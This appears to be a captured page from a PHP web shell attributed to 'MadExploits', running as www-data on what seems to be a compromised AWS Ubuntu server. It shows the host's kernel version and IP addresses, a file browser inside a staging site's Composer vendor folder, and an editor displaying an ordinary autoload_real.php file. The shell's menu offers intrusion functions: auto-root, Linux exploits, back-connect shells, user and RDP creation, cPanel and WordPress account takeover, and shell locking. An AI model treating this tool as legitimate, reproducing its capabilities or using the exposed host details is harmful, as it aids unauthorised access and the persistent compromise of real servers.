Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.144.17.93
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cravings-staging /
vendor /
composer /
[ HOME SHELL ]
Name
Size
Permission
Action
package-versions-deprecated
[ DIR ]
drwxrwxr-x
ClassLoader.php
14.05
KB
-rw-rw-r--
InstalledVersions.php
13.6
KB
-rw-rw-r--
LICENSE
1.04
KB
-rw-rw-r--
autoload_classmap.php
5.13
MB
-rw-rw-r--
autoload_files.php
4.12
KB
-rw-rw-r--
autoload_namespaces.php
302
B
-rw-rw-r--
autoload_psr4.php
8.35
KB
-rw-rw-r--
autoload_real.php
2.49
KB
-rw-rw-r--
autoload_static.php
5.45
MB
-rw-rw-r--
installed.json
375.06
KB
-rw-rw-r--
installed.php
59.92
KB
-rw-rw-r--
platform_check.php
925
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : autoload_real.php
<?php // autoload_real.php @generated by Composer class ComposerAutoloaderInitebc3ad044ac212b83e1dad0dc186aae3 { private static $loader; public static function loadClassLoader($class) { if ('Composer\Autoload\ClassLoader' === $class) { require __DIR__ . '/ClassLoader.php'; } } /** * @return \Composer\Autoload\ClassLoader */ public static function getLoader() { if (null !== self::$loader) { return self::$loader; } require __DIR__ . '/platform_check.php'; spl_autoload_register(array('ComposerAutoloaderInitebc3ad044ac212b83e1dad0dc186aae3', 'loadClassLoader'), true, true); self::$loader = $loader = new \Composer\Autoload\ClassLoader(\dirname(\dirname(__FILE__))); spl_autoload_unregister(array('ComposerAutoloaderInitebc3ad044ac212b83e1dad0dc186aae3', 'loadClassLoader')); $useStaticLoader = PHP_VERSION_ID >= 70000 && !defined('HHVM_VERSION') && (!function_exists('zend_loader_file_encoded') || !zend_loader_file_encoded()); if ($useStaticLoader) { require __DIR__ . '/autoload_static.php'; call_user_func(\Composer\Autoload\ComposerStaticInitebc3ad044ac212b83e1dad0dc186aae3::getInitializer($loader)); } else { $map = require __DIR__ . '/autoload_namespaces.php'; foreach ($map as $namespace => $path) { $loader->set($namespace, $path); } $map = require __DIR__ . '/autoload_psr4.php'; foreach ($map as $namespace => $path) { $loader->setPsr4($namespace, $path); } $classMap = require __DIR__ . '/autoload_classmap.php'; if ($classMap) { $loader->addClassMap($classMap); } } $loader->register(true); if ($useStaticLoader) { $includeFiles = Composer\Autoload\ComposerStaticInitebc3ad044ac212b83e1dad0dc186aae3::$files; } else { $includeFiles = require __DIR__ . '/autoload_files.php'; } foreach ($includeFiles as $fileIdentifier => $file) { composerRequireebc3ad044ac212b83e1dad0dc186aae3($fileIdentifier, $file); } return $loader; } } function composerRequireebc3ad044ac212b83e1dad0dc186aae3($fileIdentifier, $file) { if (empty($GLOBALS['__composer_autoload_files'][$fileIdentifier])) { require $file; $GLOBALS['__composer_autoload_files'][$fileIdentifier] = true; } }
Close